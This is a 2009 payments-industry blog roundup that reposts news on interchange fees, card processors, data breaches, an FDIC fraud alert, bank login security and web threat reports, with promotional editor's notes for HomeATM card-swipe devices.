Eftpos interchange fees cannot be consistent with debit card fees according to the Australian Retailers Association.
The ARA and the Australian Payment Merchants Forum (AMPF) say they are concerned at a Reserve Bank of Australia proposal to subject Eftpos interchange fees to the same regulation as Visa and MasterCard's debit cards.
Chairman of the AMPF and ARA executive director, Russell Zimmerman, said interchange fees were typically paid by merchants to card issuers to fund the costs of cardholder benefits. But the RBA's suggestion would increase the cost of Eftpos transactions for all Australian retailers.
"Currently, Visa and MasterCard interchange fees are regulated to be an average of 12c per transaction but it's difficult to understand why card issuers should receive 12 cents for each Eftpos transaction.
"Debit cards are a mature product and the cost of processing transactions using Eftpos is minimal. In fact in New Zealand, whose banking market is dominated by the major Australian banks, debit card payments at retailers do not attract any interchange fee.
"Consumers, who use less costly payment instruments, including Eftpos cards, effectively subsidise consumers paying with more costly payment instruments like scheme-branded credit and debit cards. The RBA's latest proposal will price every debit card payment at the highest existing rate," Zimmerman said.
VisaNet Says Brazil Antitrust Agency Suspends Exclusivity Ban
By Laura Price
(Bloomberg) -- Cia. Brasileira de Meios de Pagamento, the credit-card payment processor known as VisaNet, said Brazil’s antitrust regulator suspended a ban on exclusivity imposed by the Justice Ministry.
SDE, as the antitrust arm of the Justice Ministry is known, started a probe against VisaNet, Visa International Service Association and Visa do Brasil Empreendimentos Ltda on Aug. 6. The antitrust unit said VisaNet created exclusivity by requiring businesses to use it to be able to accept cards carrying the Visa logo.
Cade, as the antitrust regulator is known, suspended the preventive measure taken earlier this month by SDE until Cade judges the case for possible anti-competitive practices, VisaNet said in a statement to Brazil’s securities regulator late yesterday. Cade is due to judge the case on Sept. 16, VisaNet said.
Merchants of Momentum Payment Systems can now process credit and debit card transactions through its secure network by employing an iPhone, iPod Touch or T-Mobile G1 over Wifi or 3G wireless connections.
Addison, TX (PRWEB) August 31, 2009 -- Momentum Payment Systems, www.MomentumPayments.com, a leader in the electronic payment processing industry, proudly announces the Momentum Payment Systems iPhone Mobile Application.
Small business merchants, independent contractors and mobile merchants now have the ability to utilize Momentum's payment processing solutions without the need for hardware processing equipment or a dedicated internet line.
The application is currently available through Momentum's sales team and is set up via a one-time installation processthrough a web browser. Upon installation the application icon is available on the home screen of the device for convenient future use.
With the application,merchants can type the card information into the phoneand the credit and debit card transactions are processed as "card-not-present" or "offline-debit" payments.
Receipts can currently be emailed to the cardholder however future enhancement plans include the ability for the merchant to print a receipt instantly.
"We've always been dedicated to creating customized payment processing solutions to fit the needs of each business," said Vice President of Operations Robel Sebany. "We've always wanted to provide our merchants with access to a payment processing option as portable as their business and with the growing technological advancements of these mobile devices it is a great opportunity to reach that goal."
About Momentum Payment Systems
Momentum Payment Systems, LLC is a fast growing merchant acquirer that specializes in providing small and medium-sized businesses throughout the United States with comprehensive electronic transaction processing solutions. Momentum distributes and installs point-of-sale equipment and offers traditional credit and debit card processing services as well as processing for ATM cards, gift and loyalty cards, prepaid cards, EBT, checks and e-commerce solutions. Momentum also proudly offers 24 hour technical support.
For further information, please visit Momentum Payment Systems online at www.MomentumPayments.com
The State of Cybercrime: Today's Real Cybercriminals
sponsored by TippingPoint
Premiered:
28 Aug 2009
Language:
English
ABSTRACT:
The Internet is a rough neighborhood. How well is your organization policing your part of the Internet? Online fraud is pervasive and those that are behind online fraud are using sophisticated techniques to target financial and personal information.
This videocast provides an overview of current trends affecting organizations, what enables online fraud, what are some of the barriers, and suggestions for what organizations should do to combat the problem.
Key points of emphasis include:
How new threats and emerging trends in online fraud affect many organizations.
How to establish an effective Network Neighborhood Watch Program at your company.
How policy and globalization issues combat online fraud and steps you can take to protect your organization.
Speaker: Jerry Dixon
Director of Analysis, Team Cymru
Jerry Dixon is currently the director of analysis for Team Cymru, he also serves as InfraGard's vice president for Government Relations. He is the former executive director of the National Cyber Security Division (NCSD) & US-CERT, of the Department of Homeland Security.
During his time at Homeland, Dixon led the national effort to protect America's cyber infrastructure and identify cyber threats.
Dixon also served as the deputy director of operations for the U.S. Computer Emergency Readiness Team (US-CERT).
Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. He led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, local government agencies, and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.
Here's an excerpt from an article written by Rhodi Mardsen which unequivocally states the reality of what it takes to secure online banking and credit/debit card transactions conducted online. It's the economy typing stupid! Don't Type: Swipe!
HomeATM encrypts the card details so that hackers only find "random gobblygook" and manufactures the "only device" designed for eCommerce to be PCI 2.x Certified. We did it because "it's for your own good." The shift towards everyone using a HomeATM to conduct secure transactions and online banking continues...
There is a worldwide standard (the PCI-DSS) that any companies dealing with cardholder information are obliged to sign up to, but many security experts have pointed out that it's possible to tick all the PCI's boxes and still be insecure. The offence allegedly committed by Gonzalez is as vivid an illustration of that as one can imagine.
For once, this lapse in online security has nothing to do with us, the general public. We're guilty of all manner of stupidity when it comes to our personal financial security – writing down PIN numbers on Post-it notes, using the word "password" as our password (or typing "anything" into online banking sites or merchant checkout) just because we are "instructed to.") – but in this case there's nothing we could have done, save for withdrawing entirely from the 21st century and using cash instead.
So what should these companies be doing to protect us? Graham Cluley, (sounds like he has one...Clu that is) from internet security firm Sophos, has expressed his disbelief that our card details aren't encrypted when they're stored, so that hackers just find random gobbledygook. "If they were properly encrypted," he says, "it would take until the sun burns out for anyone to decode it."
Editor's Note: HomeATM believes that they shouldn't even be stored. This is why HomeATM instantaneously encrypts the card details (including the Track2 data). By doing so the Internet Retailers (IR) never store it, in fact never even handle it. This provides three distinct benefits. 1. It keeps the data safe, 2. instantaneously places the IR within the realm of PCI compliance and 3. protects the IR from significant fines which would be levied against them by V/MC in the event of a breach. Those are three pretty significant benefits...but first, we have to eliminate typing.
But it's not just the companies storing our details that need to shape up. The 130 million stolen credit card numbers would be of no use to anyone if they couldn't be used to buy stuff. Any masterminds wouldn't have been the ones picking a card number and using it to buy soft furnishings on eBay; they'd sell the numbers on to other criminals in blocks of a few thousand. But eventually, someone would pretend to be you and use your money, because it's still disconcertingly easy to do.
Online shopping is a click-happy cinch, but with that convenience comes risk; if you can tap out your 16-digit number, expiry date and a supposed "secret" three-digit number on the back of your card to book a flight to the South of France, so can anyone else.
"We may balk at the idea of carrying around an additional device (of the kind Barclays customers now have to use for online banking) to enter our PIN every time we make a credit card purchase online, but when these kind of measures are inevitably introduced, we'll have to grin and bear it. It's for our own good, after all.
As for the likes of Alberto Gonzalez, they're talented individuals capable of writing sophisticated software that can detect weaknesses in even the strongest computer defences. Indeed, such characters frequently find themselves with job offers in the industry following their release from prison. But after a 35-year stretch, technology is likely to have marched on a bit too far for anyone to catch up. Marched on so far, one would hope, that our money would finally be safe from marauding cybercriminals. Fingers crossed.
While some of the latest schemes borrow from scams past, today’s fraud schemes are as sophisticated as banks’ most advanced payments systems. And stopping them is still a challenge.
Name a payment method and there is probably some scheme to defraud it.
Since the Chinese introduced paper money, banks have been concerned about fraud. More than a thousand years later, payments fraud continues to haunt banks, consumers and businesses.
"Fraud is still rampant," comments Paul Sussman, VP with First Manhattan Consulting in New York. "The majority of businesses over $1 million in revenue are going to be exposed to payment fraud, and almost every bank is being hit by fraud today.
From simple "Dumpster diving" to organized crime rings that rely on complex computer programming, fraud scams grow in sophistication to match the evolution of payment forms. "Fraud trends continue to evolve," notes Douglas Twining, director of fraud services for Cleveland-based KeyBank ($99 billion in assets)....
click box to continue reading this or other articles...
Online crime is increasingly hitting small and mid-size companies in the U.S., draining those entities' bank accounts through fraudulent transfers. The problem has gotten so bad that a financial services group recently sent out a warning about the trend, and the Federal Deposit Insurance Corporation (FDIC) issued an alert today.
"In the past six months, financial institutions, security companies, the media and law enforcement agencies are all reporting a significant increase in funds transfer fraud involving the exploitation of valid banking credentials belonging to small and medium sized businesses," says a bulletin sent on Aug. 21 to member financial institutions by the Financial Services Information Sharing and Analysis Center, (FS-ISAC). The FS-ISAC is part of the government-private industry umbrella working with the Department of Homeland Security and Treasury Department to share information about critical threats to the country's infrastructure. The member-only alert described the problem and told its members to implement many of the precautions and monitoring currently used to detect consumer bank and credit card fraud.
The FS-ISAC notice -- and subsequent media attention -- in turn prompted the FDIC alert to warn banking institutions about this kind of fraud. The Threat
The FDIC traces the fraud to compromised login credentials on online banking websites. Over the past year, the FDIC says, it has detected an increase in the number of reports and the amount of losses resulting from unauthorized electronic fund transfers (EFTs), such as automated clearing house (ACH) and wire transfers.
Special Alert from the FDIC: (whom I think needs to learn more about our 2FA 3DES DUKPT E2EE PCI 2.x HomeATM)
Special Alerts
SA-147-2009
August 26, 2009
TO:
CHIEF EXECUTIVE OFFICER
SUBJECT:
Fraudulent Electronic Funds Transfers (EFTs)
Summary:
The Federal Deposit Insurance Corporation is aware of an increased number of fraudulent EFT transactions resulting from compromised login credentials.
The Federal Deposit Insurance Corporation (FDIC) is alerting financial institutions that provide Web-based payment origination services for business customers to increased reports of fraudulent EFT transactions resulting from compromised login credentials. Over the past year, the FDIC has detected an increase in the number of reports and the amount of losses resulting from unauthorized EFTs, such as automated clearing house (ACH) and wire transfers. In most of these cases, the fraudulent transfers were made from business customers whose online business banking software credentials were compromised.
Web-based commercial EFT origination applications are being targeted by malicious software, including Trojan horse programs, key loggers and other spoofing techniques, designed to circumvent online authentication methods. Illicitly obtained credentials can be used to initiate fraudulent ACH transactions and wire transfers, and take over commercial accounts.
These types of malicious code, or "crimeware," can infect business customers' computers when the customer is visiting a Web site or opening an e-mail attachment.
Some types of crimeware are difficult to detect because of how they are installed and because they can lie dormant until the targeted online banking session login is initiated. These attacks could result in monetary losses to financial institutions and their business customers if not detected quickly.
Financial institutions and technology service providers can refer to the following guidance for additional information on authentication and information security for high-risk transactions:
Businesses and local government agencies can find cyber security resources at http://www.us-cert.gov/.
Information about cyber-fraud incidents and other fraudulent activity may be forwarded to the FDIC's Cyber-Fraud and Financial Crimes Section, 550 17th Street, N.W., Room F-4004, Washington, D.C. 20429, or transmitted electronically to alert@fdic.gov. Questions related to federal deposit insurance or consumer issues should be submitted to the FDIC using an online form that can be accessed at http://www2.fdic.gov/starsmail/index.asp.
Consumer rights organization Which? has criticized the online banking systems of some of Britain's biggest lenders, labelling them insecure in a new report released today.
Abbey and Halifax were singled out as particularly poor. Halifax has one of the least secure log-in procedures of the ten online banks we looked at. It asks for three pieces of information to confirm a customer’s identity. "As each entry is typed in full, this makes the information vulnerable" to a simple keylogger, a virus that sits on a computer and tracks every keystroke with the aim of collecting passwords.
The same two banks, along with HSBC and First Direct, were also found to have no visible security controls for money transfers. Which? Computing also found significant differences in how well money transfers appear to be protected. Abbey, First Direct, Halifax and HSBC have no visible security controls for money transfers, so if a banking session is hijacked, a criminal can enter the amount they want to.
Which? also found that users of Abbey, Alliance & Leicester, HSBC and Halifax are not immediately logged out after a session, leaving them vulnerable if they use online banking on a shared computer. Alliance & Leicester and HSBC were rated as 'average', while First Direct, Lloyds TSB, Nationwide, NatWest and RBS were given a 'good' rating.
Barclays was the only one of the 10 banks surveyed to get a rating of 'excellent'. The company requires all its online customers to use a "two-factor authentication" (2FA) system involving a PINsentry device which generates a one-time password for each session.
Tony Dyhouse, director of the government-backed Cyber Security Knowledge Transfer Network, said that banks face a difficult challenge in trying to balance security with convenience.
Editor's Note: PINSentry is a great device for 2FA log-in, but keep in mind it's ONLY function is as an authenticator. By contrast, HomeATM utilizes 2FA for log-in, but it also enables consumers to conduct financial transactions (including money transfers) in real-time with 100% 2FA 3DES DUKKPT End-to-End (Zone 1-5) Encryption.
"Compared with younger consumers, preboomers, who are 63 or older, are more explicit in their reasons for not using online banking - they are comfortable with other channels, such as the branch, and they are worried about the security... HomeATM - http://pindebit.blogspot.com/
Debit cards are fast becoming the payment instrument of choice for U.S. consumers. According to Visa Inc., the value of purchases made using Visa-branded debit cards in 2008 surpassed dollars spent using Visa credit cards for the first time. For many consumers who have made the switch, there may be no turning back.
A Review of the Types and Trends of Data Breaches Involving Financial Institutions
August 28, 2009 - Linda McGlasson, Managing Editor
There have been 356 data breaches so far in 2009, according to the Identity Theft Resource Center (ITRC). And 46 of those breaches have involved financial institutions - up from 34 at this same time last year.
In reviewing these 46 incidents (see interactive timeline w/details of each breach), one finds goods news and bad, according to ITRC executive director Linda Foley.
The good news, Foley says, is that, based on percentages, financial institutions consistently have lower percentages of data breaches than other organizations. "This means they're doing a better job of controlling and protecting their data," she says.
The bad news is when financial institutions - or their third-party service providers -- are breached ... it's big. Example: the Heartland Payment Systems breach, which resulted in the compromise of 130 million credit and debit cards. Financial data -- bank account numbers, social security numbers, and other personal identifying information - is invaluable to hackers, and its loss is costly to consumers.
Atlanta-based startup Moneta raises $4M, to combat Paypal
ATLANTA - Moneta, a startup that says it will challenge PayPal for online payment services, has closed on $4 million in venture funding.
The Atlanta Business Chronicle reported the funding on Friday. One of Moneta’s partners is Delta Airlines.
In 2007, Moneta purchased the retail payments product from CheckFree. The system transfers money directly from the buyer’s checking account to participating merchants with lower fees than those required by charge cards.
CheckFree had offered the program for more than two years. Financial terms were not disclosed. The deal includes all customer accounts for the service. CheckFree also will provide Moneta with payment processing services.
Voltage Security Finishes Record-Setting First Half Highlighted by Diversified End-to-End Data Protection Solutions
Total contract value of deals in the first half grows by over 70%
Palo Alto, California–August 25, 2009–Voltage Security, Inc., (www.voltage.com), the global leader in end-to-end data protection, today announced another record finish to the first half of their fiscal year ended July 31, 2009. The period ended with the highest revenue quarter in the company’s history, a 35% growth over the same period last year. In addition, the company was cash flow positive from operations and profitable for the quarter. Total contract value of deals in the first half grew by over 70%.
The company also announced a 34% increase in total customer count over the past 12 months to reach more than 780 enterprise customers and more than 3,000,000 total licensed users. During the period, several seven figure deals were closed including the largest in the company’s history.
“Our recent success, especially noteworthy given the tough economic climate, reflects three major benefits of our end-to-end data protection approach: we offer a diverse and complete product set that is well aligned to large enterprise environments, provide products that scale the most cost efficiently, and offer customers the most rapidly deployable solutions in the market,” said Sathvik Krishnamurthy, president and CEO of Voltage Security. “We are finding enterprise customers want a holistic approach for data protection versus a piecemeal or point-to-point approach. Ultimately cost efficiencies are strongest when all of the moving parts are designed to work together.”
Growth Driven by Diversified Product Portfolio
Large enterprise customers are increasingly turning to Voltage to solve their corporate-wide encryption needs which center around securing sensitive and confidential employee and customer data inside applications, databases, emails, files and documents.
Milestones included:
One of the world’s largest telecommunications companies, a Fortune 50 company, licensed the entire product suite including Voltage SecureMail™ and Voltage SecureData™ for enterprise-wide deployment, enabling hundreds of thousands of employees and business partners to send and receive secure email, and protecting private customer data in thousands of applications throughout the organization.
Heartland Payment Systems, a leading payment processor, selected Voltage Security as a partner to develop end-to-end encryption specifically suited to payments processing. Heartland also licensed Voltage SecureMail™ and Voltage SecureFile™ to protect personal information throughout its corporate and extended business network. Click here for more information.
Wells Fargo & Company, one of the nation’s largest banks, announced it had selected and deployed Voltage SecureMail™ to secure email between Wells Fargo team members, customers vendors and extended business partners. Click here for more information
Early Vision Being Realized
Adding to the popularity of Voltage end-to-end data protection solutions is the ease provided by the underlying key management architecture.
“We’ve always understood that the way to make encryption work for large-scale deployments is through simplified key management,” continued Krishnamurthy. “Now, we are seeing our vision reach a tipping point where enterprises have an urgent need to comprehensively protect information, and we offer them a complete family of easy to deploy, scalable, cost-efficient and powerful solutions.”
The flagship Voltage SecureMail™, powered by Voltage Identity-Based Encryption™ (IBE), is consistently selected for the largest enterprise-wide implementations in corporate America with typical deployments in the 50,000 to 500,000 employee range. Voltage SecureData™, by reducing audit scope and ongoing operational cost, is experiencing a rapid increase in demand and quickly establishing itself as the preferred solution for end-to-end encryption and stateless tokenization.
Enterprise Customers Representing a Wide-Variety of Industries
A wide-variety of enterprise customers are increasingly turning to Voltage to protect information throughout their organizations and beyond. A selection of new customers includes:
Fortune 100 global payments and travel company
Fortune 100 provider of property and casualty insurance for auto, home and business
Fortune 200 global media and entertainment company
Fortune 500 provider of financial services to institutional investors
Voltage Standardization Initiatives Continue
Voltage continues to participate in a number of industry standardization initiatives including:
NIST (National Institute of Standards and Technology) is reviewing Feistel Finite Set Encryption Mode (FFSEM), designed to encrypt smaller blocks of data in a manner that preserves the format of data – see the Computer Security Division annual report
PCI Security Standards Council – Voltage is a participating organization and is a strong advocate of end-to-end encryption and tokenization technologies as effective mechanisms for the reduction of audit scope
IEEE– Voltage is involved in developing the P1619.3 key management protocol and the P1363.3 pairing-based public key cryptography standard
ASC X9 – Voltage is participating in the F1, F4 and F6 efforts to protect payment data
IETF – Voltage-contributed RFCs 5048, 5049 and 509 which cover open standards for Identity-Based Encryption and have now been approved.
Most recently, Voltage was one of the few security vendors that participated in the National Cyber Leap Year Summit. This invitation-only event was organized by the White House Office of Science and Technology Policy and the Federal Networking and Information Technology Research and Development Program, and was designed to provide expert advice to the government on the best ways to address today's most pressing cyber-security problems.
About Voltage Security
Voltage Security, Inc., an enterprise security company, is an encryption innovator and global leader in end-to-end data protection. Voltage solutions, based on next generation cryptography, provide end-to-end encryption, tokenization and stateless key management for protecting valuable, regulated and sensitive information based on policy. Voltage products enable reduction in audit scope with rapid implementation and the lowest total cost of ownership in the industry through the use of award-winning cryptographic solutions, including Voltage Identity-Based Encryption™ (IBE) and a new breakthrough innovation: Format-Preserving Encryption™ (FPE). Offerings include Voltage SecureMail™, Voltage SecureData™, Voltage SecureFile™ and the Voltage Security Network™ (VSN), an on-demand managed service for the extended business network.
As a service to the industry and general public, the company maintains the Voltage Data Breach Index and Map which is continuously updated with global data breach information: www.voltage.com/data-breach . The Company has been issued several patents based upon breakthrough research in mathematics and cryptographic systems. Customers include Global 1000 companies in banking, retail, insurance, energy, healthcare and government. To learn more about Voltage customers and sign up for the customer news letter please visit www.voltage.com/customers.
U.K. researcher says vulnerability in Twitter API lets an attacker take over a victim's account -- with a tweet
By Kelly Jackson Higgins - arkReading
A newly exposed cross-site scripting (XSS) vulnerability in Twitter lets an attacker wrest control of a victim's account merely by sending him or her a tweet.
U.K. researcher James Slater reported the serious flaw earlier this week, and now says Twitter's fix in response to his disclosure doesn't actually fix the problem. "It seems they've made a pretty amateurish attempt to fix the issue, completely missing the massive problem staring them in the face," Slater said in his blog.
The attack basically exploits an input validation weakness in a field of the form used for adding third-party Twitter clients, such as TweetDeck and Twitterific. The form doesn't fully vet what can go in that box, Slater said, so an attacker can put JavaScript tags there as well as raw HTML code, for instance. "Whatever I type in that box will appear at the end of my tweets," he blogged in a follow-up post. "Anyone who sees that tweet will then be viewing that code."
IBM's X-Force Trend and Risk Report has "officially" verified what the HomeATM Blog has been messaging for the last 16 months, which is basically that if you are going to conduct a financial transaction, it must be done outside the browser space...because browsers are unsafe. You may had seen yesterday's post concerning the Top 11 eCommerce Paradigm Shifters which put HomeATM in Gear. Combined with today's release of their X-Force Report, you gotta like HomeATM's approach to securing online transactions as we are the only company who does it "outside" the browser space. (using our simple 2FA 3DES DUKPT E2EE. :-)
The IBM X-Force Trend and Risk Report is produced twice per year: once at mid-year and once at year-end. This report provides statistical information about all aspects of threats that affect web security, including software vulnerabilities and public exploitation, malware, spam, phishing, web-based threats, and general cyber criminal activity.
They are intended to help customers, fellow researchers, and the public at large understand the changing nature of the threat landscape and what might be done to mitigate it...like swipe vs. type! The report also reveals what it describes as “an unprecedented state of Web insecurity" as Web client, server, and content threats converge to create an untenable risk landscape.”
IBM’s researchers have clocked a 508% increase in the number of new malicious Web links and a level of veiled Web exploits, especially in PDF files, which is now running at an all time high.
The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. PDF vulnerabilities disclosed in the first half of 2009 apparently surpassed disclosures from all of 2008.
“No one is to be trusted,” said X-Force Director Kris Lamb. “There is no such thing as safe browsing. We’ve reached a tipping point where every web site should be viewed as suspicious and every user is at risk.”
Editor's Note: Sound like a familiar rant? I'm coming from help when I say: "Don't Type...Swipe!" Want to register to read the report? Here's the Link (PDF) Also...here's IBM"s Press Release:
ARMONK, N.Y.
-
26 Aug 2009:
IBM (NYSE: IBM ) today released results from its X-Force 2009 Mid-Year Trend and Risk Report. The report's findings show an unprecedented state of Web insecurity as Web client, server, and content threats converge to create an untenable risk landscape.
According to the report, there has been a 508 percent increase in the number of new malicious Web links discovered in the first half of 2009. This problem is no longer limited to malicious domains or untrusted Web sites. The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. The ability to gain access and manipulate data remains the primary consequence of vulnerability exploitations.
The X-Force report also reveals that the level of veiled Web exploits, especially PDF files, are at an all time high, pointing to increased sophistication of attackers. PDF vulnerabilities disclosed in the first half of 2009 surpassed disclosures from all of 2008. From Q1 to Q2 alone, the amount of suspicious, obfuscated or concealed content monitored by the IBM ISS Managed Security Services team nearly doubled.
"The trends highlighted by the report seem to indicate that the web has finally taken on the characteristics of the Wild West where no one is to be trusted," said X-Force Director Kris Lamb. "There is no such thing as safe browsing today and it is no longer the case that only the red light district sites are responsible for malware.
We've reached a tipping point where every Web site should be viewed as suspicious and every user is at risk. The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity."
Web security is no longer just a browser or client-side issue; criminals are leveraging insecure Web applications to target the users of legitimate Web sites. The X-Force report found a significant rise in Web application attacks with the intent to steal and manipulate data and take command and control of infected computers. For example, SQL injection attacks - attacks where criminals inject malicious code into legitimate Web sites, usually for the purpose of infecting visitors - rose 50 percent from Q4 2008 to Q1 2009 and then nearly doubled from Q1 to Q2.
"Two of the major themes for the first half of 2009 are the increase in sites hosting malware and the doubling of obfuscated Web attacks," Lamb said. "The trends seem to reveal a fundamental security weakness in the Web ecosystem where interoperability between browsers, plugins, content and server applications dramatically increase the complexity and risk. Criminals are taking advantage of the fact that there is no such thing as a safe browsing environment and are leveraging insecure Web applications to target legitimate Web site users."
The 2009 Midyear X-Force report also finds that:
Vulnerabilities have reached a plateau. There were 3,240 new vulnerabilities discovered in the first half of 2009, an eight percent decrease over the first half of 2008. The rate of vulnerability disclosures in the past few years appears to have reached a high plateau. In 2007, the vulnerability count dropped for the first time, but then in 2008 there was a new record high. The annual disclosure rate appears to be fluctuating between six and seven thousand new disclosures each year.
PDF vulnerabilities have increased. Portable Document Format (PDF) vulnerabilities disclosed in the first half of 2009 already surpassed disclosures from all of 2008.
Trojans account for more than half of all new malware. Continuing the recent trend, in the first half of 2009, Trojans comprised 55 percent of all new malware, a nine percent increase over the first half of 2008. Information-stealing Trojans are the most prevalent malware category.
Phishing has decreased dramatically. Analysts believe that banking Trojans are taking the place of phishing attacks geared toward financial targets. In the first half of 2009, 66 percent of phishing was targeted at the financial industry, down from 90 percent in 2008. Online payment targets make up 31 percent of the share.
URL spam is still number one, but image-based spam is making a comeback. After nearing extinction in 2008, image-based spam made a comeback in the first half of 2009, yet it still makes up less than 10 percent of all spam.
Nearly half of all vulnerabilities remain unpatched. Similar to the end of 2008, nearly half (49 percent) of all vulnerabilities disclosed in the first half of 2009 had no vendor-supplied patch at the end of the period.
Translation: Do Not Type...Swipe!
The X-Force research team has been cataloguing, analyzing and researching vulnerability disclosures since 1997. With more than 43,000 security vulnerabilities catalogued, it has the largest vulnerability database in the world. This unique database helps X-Force researchers to understand the dynamics that make up vulnerability discovery and disclosure.
IBM is one of the world's leading providers of risk and security solutions. Clients around the world partner with IBM to help reduce the complexities of security and strategically manage risk. IBM's experience and range of risk and security solutions -- from dedicated research, software, hardware, services and global Business Partner value -- are unsurpassed, helping clients secure business operations and implement company-wide, integrated risk management programs.
Finextra: Over eight million Brits have handed over their Chip and PIN details to someone else in the last year, with a quarter of these falling victim to fraud, according to a survey for insurance firm LV=.
An online poll of 3002 people shows 20% have given out their card and PIN number - 85% of these in the past year - to someone else to make a purchase on their behalf or get money from a cash machine.
By far the worst offenders are younger people with over one in three of the under 35s admitting they have asked someone else to use one of their cards. The most common location for 'borrowed' cards to be used is at a cash machine.
"Credit card companies should be federally regulated"
OTTAWA, Aug 26 (Reuters) - Canada's banking regulator should license and approve all financial instruments available to investors in the country, even if they originate in the United States, a new report recommended on Wednesday.
The report by two economists at the Canadian Centre for Policy Alternatives, a left-leaning think tank, also urged the rapid creation of a single securities regulator in Canada to make sure officials can properly monitor markets and detect risky behavior or excesses before they get out of control.
A single financial markets watchdog, replacing the 13 regional regulators now in place, is a key ambition of Finance Minister Jim Flaherty and would bring under federal jurisdiction the "shadow" banking sector. That unregulated sector once accounted for nearly half of all Canadian borrowing and includes non-bank lenders as well as hedge funds and securitized debt vehicles.
Aug. 26 (Bloomberg) -- Redecard SA and Cia. Brasileira de Meios de Pagamento, Brazil’s biggest debit- and credit-card payment processing companies, fell the most in at least two weeks after a newspaper reported the companies may face increased competition from state-controlled lenders. Redecard, the processor of Mastercard Inc. payments, lost 1.7 percent to 26.25 reais in Sao Paulo trading for the biggest decline since Aug. 12. VisaNet, as the processor of Visa Inc. payments is known, slid 3.3 percent, the most since Aug. 6, to 16.81 reais.
Federally controlled banks Banco do Brasil SA and Caixa Economica Federal will “soon” start offering credit cards under their own brand as part of a government effort to increase competition, Brasilia-based Correio Braziliense newspaper reported today without saying where it obtained the information.
“The report adds to concern that these companies will face more competition in the future,” said Mariana Taddeo, an analyst with Link Investimentos in Sao Paulo.
ARA concerned at RBA review of interchange regulation > Inside Retailing ![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sYKnyt1UCAeeO2mWCvOxGZcjFl91C-bWOFr7fmrQwGhK728zpteHiSeSfSCxpTjmvj9n2GUOwRnZVyCLlS7A_pcZKvz8Cpn_4c5gdhHLWhqMOnPlTigGH0PwZhuRAcEhO81HuwvjcoeyO8rzXc2F61=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tb2HRXbIBoo8PVVBKK7b7UAn23eBVaSV1HmxGV2Fkuq7fwo7Bt_dDKmH013nSwsH4nRXgiIkiVm1Jk42bpc3Q_OrR7CtrvYBV2UqLWE5i4MQuXqJiJFHXY7_BR3z3voYCa1BOqRCwQjs08NXrKadi-=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ujJ3e9iBd_j0JsOC9EYINGJv1Cd8GU10NK8_W1XERjA5V0YBdYVNgbMdNcQkxXN0O3crhL6qZmWZpTSVM_sBPA_83Q26I2vTRVxycjPOjGK_K1dTvCica98hMCYRkM9KuSkzVV5NSC9rS54u4jBrI=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uZ8KKzdmrEOws0iOIWYBD8O7lwPx659peT6XU-1L5dwesvn8PEIUai-5_QHM4qRuFkEkqzlIK9Kr5Sq2hzt1lWwrqYYSXYNyrY4udkG4VSz7qSj-57vbWHSg0QuuSMyYZ7zodgKvGAOCTbauwPdFNd=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t99hdlCoIDtTqSHFki1Iq5WM9ofD__jVmPbrm5k1_XSQ3b06PDb4b3oLEAXTP52PGI_iT_6Ubh3Qb_ukAghOvqRDFo3b3_N6XFh9lbbzjeBR6_lYk71jZSEiJJellskKxhCIEFoYadKDj1hqsIxKnS=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sIsAuv4Ipha19eeF9m1fMZZ4odZlU1ZatA0DlkQ8w48Eg23CHQxyjjdyMVuEbcfUnVKa7Pg49n-JfiA7xaiF_Uk2Iih4xFjxx3Jbkgn6BYMb6k_zRyqXGY0JErgVH5kcJK1n6xQssCRSV8fHjcHNun=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tD6TzXU2-SP4U-ZHmcMgZXLAtht6epGx96EEe6GE8gVU0T4AtKg7Pq6MRWsWdC2_KCGDWXb3ZZppudQwwD_QD7zuL8_DbLkAn2FjIpHW3Hm8FUwc9P1O-ZMgvfouufqJP0tp-aS1istCusuIqM-bAQ=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucT3DkDA2GbmxntHAvP9JA2sUHlecTfmkTS1TMCr8ZCR16of9B-kkp3GE_KJyXGiIt9rvzeKpO-FXq462Lo4xwmIoYmxbbJX7Y579NRcEbpMxIm5oSM91b-4tWqKUf5_LjNN7DCuv8u526eO2sVzio=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t4Rz1rhY0HZgh01gO68dR0d5LsTyANplUJ-CPFr9l5Fk7lVuzt_Tj6Ht6sry9CrpLejeFXGG-_6Gym3tsDS8uXRrym6i2wNW-Rz4PosOkc0OKkP8BMcTlhpYvbtWtXFqJas1DvsZoQjyITvm5GnSSc=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCjPrRSu3P0EsvksaXIIbmGIRtp9TtRBa6r3r_Ll-12eZC3jehzaQKym_fxjA1w-50HJfzJAlzcaDJdFf_HCN50kJrzThEAAl4cLBQhTZiqQ3FVv7F-hYwwjknFp53-5n01mgvloBQcqIe1pgklAM=s0-d)
![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHM3U2bl-J9n81MwjbIdoe8IlCekwduqCU4TqfGf8L1TpZB07DW-GsK5VTxRnRv-GNgAiWLuqgpMA5sb6qePtlozbLKXqi1hwoBzzLSyiCLRUCtqfnsICSyyQrUumZddh4mq1GdzBTQZV6XFZW2AnL=s0-d)
